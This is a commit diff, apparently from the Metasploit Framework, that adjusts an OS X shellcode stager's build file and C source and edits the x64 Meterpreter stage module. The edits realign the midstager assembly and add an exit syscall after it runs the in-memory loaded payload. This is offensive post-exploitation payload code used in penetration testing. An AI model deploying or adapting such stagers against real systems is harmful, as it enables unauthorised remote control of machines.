more fixes

timwr · timwr · commit 0ce125ec5523 · 2018-01-30T17:54:10.000+08:00
diff --git a/external/source/shellcode/osx/stager/Makefile b/external/source/shellcode/osx/stager/Makefile
@@ -1,12 +1,6 @@
-CFLAGS=-fno-stack-protector -fomit-frame-pointer -fno-exceptions -fPIC -O0
-SDK=`xcrun --sdk iphoneos --show-sdk-path`
-GCC_BIN=`xcrun --sdk iphoneos -f gcc`
-GCC_BASE=$(GCC_BIN) $(CFLAGS) -Wimplicit -isysroot $(SDK)
-GCC=$(GCC_BASE) -arch arm64
-
-SDK_OSX=`xcrun --sdk macosx --show-sdk-path`
+CFLAGS=-fno-stack-protector -fomit-frame-pointer -fno-exceptions -fPIC -Os -O0
 GCC_BIN_OSX=`xcrun --sdk macosx -f gcc`
-GCC_BASE_OSX=$(GCC_BIN_OSX) -Os $(CFLAGS) 
+GCC_BASE_OSX=$(GCC_BIN_OSX) $(CFLAGS)
 GCC_OSX=$(GCC_BASE_OSX) -arch x86_64
 
 all: clean main_osx
@@ -21,5 +15,5 @@ shellcode: install
 	otool -tv main_osx
 
 clean:
-	rm -f *.o main_ios main_osx
+	rm -f *.o main_osx
 
diff --git a/external/source/shellcode/osx/stager/main.c b/external/source/shellcode/osx/stager/main.c
@@ -20,7 +20,7 @@
 typedef NSObjectFileImageReturnCode (*NSCreateObjectFileImageFromMemory_ptr)(void *address, unsigned long size, NSObjectFileImage *objectFileImage);
 typedef NSModule (*NSLinkModule_ptr)(NSObjectFileImage objectFileImage, const char* moduleName, unsigned long options);
 
-uint64_t find_macho(uint64_t addr, unsigned int increment, unsigned int dereference);
+uint64_t find_macho(uint64_t addr, unsigned int increment, unsigned int pointer);
 uint64_t find_symbol(uint64_t base, char* symbol);
 uint64_t find_entry_offset(struct mach_header_64 *mh);
 int string_compare(const char* s1, const char* s2);
diff --git a/modules/payloads/stages/osx/x64/meterpreter.rb b/modules/payloads/stages/osx/x64/meterpreter.rb
@@ -101,9 +101,9 @@ def handle_intermediate_stage(conn, payload)
 
       ; setup stack?
       and rsp, -0x10              ; Align
-      add sp, 0x40                 ; Add room for initial stack and prog name
+      add sp, 0x40                ; Add room for initial stack and prog name
       mov rax, 109                ; prog name "m"
-      push 0                    ;
+      push 0                      ;
       mov rcx, rsp                ; save the stack
       push 0
       push 0
@@ -122,6 +122,11 @@ def handle_intermediate_stage(conn, payload)
       mov rax, #{entry_offset}
       add rsi, rax
       call rsi
+
+      ; exit
+      mov eax, 0x2000001
+      mov rdi, 0x1
+      syscall
     )
     midstager = Metasm::Shellcode.assemble(Metasm::X64.new, midstager_asm).encode_string
     print_status("Transmitting first stager...(#{midstager.length} bytes)")
